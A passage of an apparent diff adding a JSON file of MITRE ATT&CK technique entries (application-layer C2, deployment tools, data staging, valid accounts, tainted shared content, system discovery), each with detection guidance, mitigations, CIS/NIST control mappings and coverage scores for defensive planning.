directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 2.0659125307600004, + "adjusted_score": 2.0659125307600004, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "3.1,3.11,3.12,3.3,3.4,4.1,5.4,6.1,6.2,6.8,8.1,8.2,8.3,8.9,12.8,3.10,8.10" + ], + "nist_controls": [ + "AC-16", + "AC-17", + "AC-18", + "AC-19", + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-6", + "CP-6", + "CP-7", + "CP-9", + "SC-36", + "SC-4", + "SI-12", + "SI-23", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1071", + "name": "Application Layer Protocol", + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. ", + "url": "https://attack.mitre.org/techniques/T1071", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1071.001", + "name": "Application Layer Protocol: Web Protocols", + "url": "https://attack.mitre.org/techniques/T1071/001", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.002", + "name": "Application Layer Protocol: File Transfer Protocols", + "url": "https://attack.mitre.org/techniques/T1071/002", + "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.003", + "name": "Application Layer Protocol: Mail Protocols", + "url": "https://attack.mitre.org/techniques/T1071/003", + "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1071.004", + "name": "Application Layer Protocol: DNS", + "url": "https://attack.mitre.org/techniques/T1071/004", + "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ", + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for DNS traffic to/from known-bad or suspicious domains.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ], + "cumulative_score": 0.9357645162161905, + "adjusted_score": 0.9357645162161905, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [ + "13.3,13.8" + ], + "nist_controls": [ + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-10", + "SC-20", + "SC-21", + "SC-22", + "SC-23", + "SC-31", + "SC-37", + "SC-7", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1072", + "name": "Software Deployment Tools", + "description": "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).\n\nAccess to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.\n\nThe permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.", + "url": "https://attack.mitre.org/techniques/T1072", + "tactics": [ + "Execution", + "Lateral Movement" + ], + "detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1015", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.", + "url": "https://attack.mitre.org/mitigations/M1015" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1029", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "url": "https://attack.mitre.org/mitigations/M1029" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 1.202198596215238, + "adjusted_score": 1.202198596215238, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "3.12,4.1,4.4,4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,7.1,7.2,7.3,7.4,7.5,12.2,12.8,14.9,15.7,16.1,16.8,16.9,18.3,18.5,16.10" + ], + "nist_controls": [ + "AC-12", + "AC-2", + "AC-20", + "AC-3", + "AC-4", + "AC-5", + "AC-6", + "CA-7", + "CM-2", + "CM-5", + "CM-6", + "CM-7", + "CM-8", + "IA-2", + "IA-5", + "SC-12", + "SC-17", + "SC-46", + "SC-7", + "SI-2", + "SI-23", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1074", + "name": "Data Staged", + "description": "Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.", + "url": "https://attack.mitre.org/techniques/T1074", + "tactics": [ + "Collection" + ], + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "File: File Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1074.001", + "name": "Data Staged: Local Data Staging", + "url": "https://attack.mitre.org/techniques/T1074/001", + "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.", + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [] + }, + { + "tid": "T1074.002", + "name": "Data Staged: Remote Data Staging", + "url": "https://attack.mitre.org/techniques/T1074/002", + "description": "Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)\n\nBy staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.", + "detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.\n\nMonitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 1.6496250792419047, + "adjusted_score": 1.6496250792419047, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1078", + "name": "Valid Accounts", + "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)", + "url": "https://attack.mitre.org/techniques/T1078", + "tactics": [ + "Defense Evasion", + "Initial Access", + "Persistence", + "Privilege Escalation" + ], + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Logon Session: Logon Session Creation", + "Logon Session: Logon Session Metadata", + "User Account: User Account Authentication" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1078.001", + "name": "Valid Accounts: Default Accounts", + "url": "https://attack.mitre.org/techniques/T1078/001", + "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)", + "detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1078.002", + "name": "Valid Accounts: Domain Accounts", + "url": "https://attack.mitre.org/techniques/T1078/002", + "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.", + "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + }, + { + "tid": "T1078.003", + "name": "Valid Accounts: Local Accounts", + "url": "https://attack.mitre.org/techniques/T1078/003", + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1078.004", + "name": "Valid Accounts: Cloud Accounts", + "url": "https://attack.mitre.org/techniques/T1078/004", + "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.", + "detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1013", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "url": "https://attack.mitre.org/mitigations/M1013" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + } + ], + "cumulative_score": 1.62655230974, + "adjusted_score": 1.62655230974, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.8,16.1,16.9" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-7", + "CA-8", + "CM-5", + "CM-6", + "IA-12", + "IA-2", + "IA-5", + "RA-5", + "SA-10", + "SA-11", + "SA-15", + "SA-16", + "SA-17", + "SA-3", + "SA-4", + "SA-8", + "SC-28", + "SI-4", + "SR-6" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1080", + "name": "Taint Shared Content", + "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", + "url": "https://attack.mitre.org/techniques/T1080", + "tactics": [ + "Lateral Movement" + ], + "detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.", + "platforms": [ + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "File: File Creation", + "File: File Modification", + "Network Share: Network Share Access", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + } + ], + "cumulative_score": 0.751907368157143, + "adjusted_score": 0.751907368157143, + "has_car": false, + "has_sigma": false, + "has_es_siem": true, + "has_splunk": false, + "cis_controls": [ + "2.5,3.3,4.1,6.1,6.2,6.8,10.5" + ], + "nist_controls": [ + "AC-3", + "CA-7", + "CM-2", + "CM-7", + "SC-4", + "SC-7", + "SI-10", + "SI-3", + "SI-4", + "SI-7" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1082", + "name": "System Information Discovery", + "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)", + "url": "https://attack.mitre.org/techniques/T1082", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and 